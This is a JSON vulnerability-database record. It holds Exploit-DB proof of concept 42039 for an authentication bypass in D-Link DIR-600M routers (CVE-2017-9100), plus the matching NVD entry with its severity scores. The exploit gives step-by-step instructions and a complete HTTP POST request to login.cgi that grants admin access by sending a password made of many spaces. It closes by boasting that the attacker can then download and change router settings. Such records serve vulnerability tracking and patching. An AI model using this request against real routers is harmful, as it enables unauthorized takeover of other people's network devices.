{"lastseen": "2017-05-21T04:50:17", "osvdbidlist": [], "references": [], "description": "D-Link DIR-600M Wireless N 150 - Authentication Bypass. Webapps exploit for Hardware platform. Tags: Credentials Bypass aka Admin Bypass AKA Auth Bypass (AB/CB)", "reporter": "Exploit-DB", "published": "2017-05-19T00:00:00", "type": "exploitdb", "title": "D-Link DIR-600M Wireless N 150 - Authentication Bypass", "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-05-21T04:50:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-9100"]}], "modified": "2017-05-21T04:50:17", "rev": 2}, "vulnersScore": 5.7}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9100"], "modified": "2017-05-19T00:00:00", "id": "EDB-ID:42039", "href": "https://www.exploit-db.com/exploits/42039/", "viewCount": 574, "sourceData": "# Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass\r

# Date: 19-05-2017\r

# Software Link: http://www.dlink.co.in/products/?pid=DIR-600M\r

# Exploit Author: Touhid M.Shaikh\r

# Vendor : www.dlink.com\r

# Contact : http://twitter.com/touhidshaikh22\r

# Version: Hardware version: C1\r

Firmware version: 3.04\r

# Tested on:All Platforms\r

\r

\r

1) Description\r

\r

After Successfully Connected to D-Link DIR-600M Wireless N 150\r

Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router's\r

Admin Panel Just by Feeding Blank Spaces in the password Field.\r

\r

Its More Dangerous when your Router has a public IP with remote login\r

enabled.\r

\r

For More Details : www.touhidshaikh.com/blog/\r

\r

IN MY CASE,\r

Router IP : http://192.168.100.1\r

\r

\r

\r

Video POC : https://www.youtube.com/watch?v=waIJKWCpyNQring\r

\r

2) Proof of Concept\r

\r

Step 1: Go to\r

Router Login Page : http://192.168.100.1/login.htm\r

\r

Step 2:\r

Fill username: admin\r

And in Password Fill more than 20 tims Spaces(\" \")\r

\r

\r

\r

Our Request Is look like below.\r

-----------------ATTACKER REQUEST-----------------------------------\r

\r

POST /login.cgi HTTP/1.1\r

Host: 192.168.100.1\r

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101\r

Firefox/45.0\r

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r

Accept-Language: en-US,en;q=0.5\r

Accept-Encoding: gzip, deflate\r

Referer: http://192.168.100.1/login.htm\r

Cookie: SessionID=\r

Connection: close\r

Content-Type: application/x-www-form-urlencoded\r

Content-Length: 84\r

\r

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send\r

\r

\r

--------------------END here------------------------\r

\r

Bingooo You got admin Access on router.\r

Now you can download/upload settiing, Change setting etc.\r

\r

\r

\r

\r

-------------------Greetz----------------\r

TheTouron(www.thetouron.in), Ronit Yadav\r

-----------------------------------------", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42039/"}

{"cve": [{"lastseen": "2019-05-29T18:17:11", "description": "login.cgi on D-Link DIR-600M devices with firmware 3.04 allows remote attackers to bypass authentication by entering more than 20 blank spaces in the password field during an admin login attempt.", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-21T04:29:00", "title": "CVE-2017-9100", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9100"], "modified": "2017-06-02T18:34:00", "cpe": ["cpe:/a:dlink:dir-600m_firmware:3.04"], "id": "CVE-2017-9100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9100", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}]}